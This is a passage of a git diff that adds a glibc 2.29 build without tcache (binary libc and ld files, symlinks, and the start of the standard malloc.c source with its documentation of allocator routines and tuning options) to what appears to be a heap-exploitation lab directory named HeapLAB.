+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.29_no-tcache/ld-2.29.so b/HeapLAB/.glibc/glibc_2.29_no-tcache/ld-2.29.so
new file mode 100755
index 0000000..412025e
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_no-tcache/ld-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.29_no-tcache/ld.so.2
new file mode 120000
index 0000000..1b67396
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.29_no-tcache/libc-2.29.so b/HeapLAB/.glibc/glibc_2.29_no-tcache/libc-2.29.so
new file mode 100755
index 0000000..cd7292a
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_no-tcache/libc-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.29_no-tcache/libc.so.6
new file mode 120000
index 0000000..89bb464
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.29_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.29_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..feaf7ee
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29_no-tcache/malloc/malloc.c
@@ -0,0 +1,5609 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2019 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
